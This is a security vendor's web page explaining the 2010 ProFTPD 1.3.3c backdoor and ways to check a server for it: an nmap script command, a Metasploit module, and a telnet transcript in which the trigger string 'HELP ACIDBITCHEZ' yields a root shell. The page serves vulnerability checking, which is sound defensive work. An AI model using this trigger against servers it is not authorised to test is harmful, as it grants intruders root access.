Proftpd Backdoor Checker

What is FTP ?

FTP (File Transfer Protocol) is a TCP-based protocol that enables file transfer between the server and the client. There is various software that offers FTP service. PROFTPD is one of this software and it has an interesting story.

What is ProFTP Backdoor Vulnerability ?

In 2010, cyber attackers managed to place a backdoor code snippet to ProFTPD 1.3.3c version source code. Attackers logged in to all systems using this 1.3.3.c version with this backdoor and did unauthorised operations.

This vulnerability not only enabled attackers to access the files but also toaccess to user rights with the highest authorisation.

If you installed ProFTPD 1.3.3c version with changed source code in 2010, you might be impacted by this vulnerability. You don’t need to worry. You can easily check for free whether your server is impacted by this vulnerability from securityforeveryone.com.

How To Check ProFTP Backdoor Vulnerability ?

You can check ProFTP Backdoor vulnerability with our free and online ProFTP Backdoor Vulnerability Checker tool. To do this, you can start by typing your domain name in the form on top of the page and start scanning.

Or you can run nmap --script ftpproftpd-backdoor -p 21 Target_Host command on nmap tool which can be installed to all operating systems.

Additionally, you can use proftpd_133c_backdoor exploit module of “Metasploit Framework” software on Linux or OS X operating system to check the vulnerability.

Lastly, you can check manually. If your FTP server is impacted from this vulnerability, you will have a result similar to the following:

	$ telnet 172.19.0.100 21
	Trying 172.19.0.100...
	Connected to 172.19.0.100.
	Escape character is '^]'.
	220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [172.19.0.100]
	HELP ACIDBITCHEZ
	id;
	uid=0(root) gid=0(root) groupes=65534(nogroup)
	^]